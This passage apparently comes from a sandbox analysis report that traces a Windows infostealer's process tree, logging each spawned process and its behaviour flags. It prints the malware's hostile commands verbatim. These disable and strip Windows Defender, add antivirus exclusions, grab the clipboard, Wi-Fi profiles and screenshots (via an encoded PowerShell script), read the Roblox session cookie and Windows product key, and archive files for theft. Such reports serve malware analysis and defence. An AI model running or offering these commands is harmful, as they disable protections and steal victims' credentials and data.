    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2800

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\iamges\image.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\iamges\image.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1884
- C:\Users\Admin\AppData\Local\Temp\RarSFX2\image2.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\image2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1388
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3tbik3bq\3tbik3bq.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1540
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB78E.tmp" "c:\Users\Admin\AppData\Local\Temp\3tbik3bq\CSC8D8C6407B73C441EB231E91B107A25F7.TMP"
      4⤵
      PID:944
- - C:\Users\Admin\AppData\Local\Temp\Runtime.exe
    "C:\Users\Admin\AppData\Local\Temp\Runtime.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:400
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /create /f /tn "WAN Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmpC588.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:2328
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /create /f /tn "WAN Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpC5E7.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:4916

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\image\image.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\image\image.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5056
- C:\Users\Admin\AppData\Local\Temp\RarSFX3\tv.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX3\tv.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\015qbyjk\015qbyjk.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1028
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF728.tmp" "c:\Users\Admin\AppData\Local\Temp\015qbyjk\CSCDE2A3830C2194C0A9DC2CCC91924F1D.TMP"
      4⤵
      PID:3380
- - C:\Users\Admin\AppData\Local\Temp\Runtime Broker1.exe
    "C:\Users\Admin\AppData\Local\Temp\Runtime Broker1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1212
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX4\Runtime Broker.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Runtime Broker.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3680
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX4\runexehelper.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX4\runexehelper.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3332
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX4\runexehelper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\runexehelper.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:936
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX4\runexehelper.exe'"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX4\runexehelper.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4916
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3632
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3300
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:1908
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1580
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:1884
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2076
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        6⤵
        
        PID:3028
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2964
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        6⤵
        Clipboard Data
        
        PID:2868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        7⤵
        Clipboard Data
        Suspicious use of AdjustPrivilegeToken
        
        PID:1876
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:3892
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3644
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:3112
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:2784
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5008
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3728
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        6⤵
        
        PID:5056
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:4940
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        6⤵
        
        PID:3756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4120
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gmv4ryrl\gmv4ryrl.cmdline"
        8⤵
        
        PID:5492
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2608.tmp" "c:\Users\Admin\AppData\Local\Temp\gmv4ryrl\CSC5601710EBF6B4E409869C62625553582.TMP"
        9⤵
        
        PID:5620
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5284
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:5360
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5400
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:5452
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5480
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:5548
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5568
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:5656
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5720
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:5792
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1692"
        6⤵
        
        PID:5844
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1692
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5896
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2892"
        6⤵
        
        PID:5928
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2892
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5984
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        6⤵
        
        PID:4124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5260
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        6⤵
        
        PID:2304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        
        PID:2696
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        6⤵
        
        PID:772
        
        C:\Windows\system32\getmac.exe
        
        getmac
        7⤵
        
        PID:5592
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI33322\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\9ifME.zip" *"
        6⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\_MEI33322\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI33322\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\9ifME.zip" *
        7⤵
        Executes dropped EXE
        
        PID:1624
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        6⤵
        
        PID:3552
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        7⤵
        
        PID:4328
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        6⤵
        
        PID:1984
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        7⤵
        
        PID:5804
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:5752
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        
        PID:4364
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        6⤵
        
        PID:5824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1380
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        6⤵
        
        PID:2144
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:2208
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        6⤵
        
        PID:3356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        7⤵
        
        PID:5912

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\image\Runtime.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\image\Runtime.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:2948

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\topg6565767677\topg6565767677\K1ngmsi\K1NG_Spoffer.msi"
1⤵
- Enumerates connected drives
PID:3260

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:3764
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:5372
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 2F486483EF1E14D5197F6665F93B0389
  2⤵
  - Loads dropped DLL
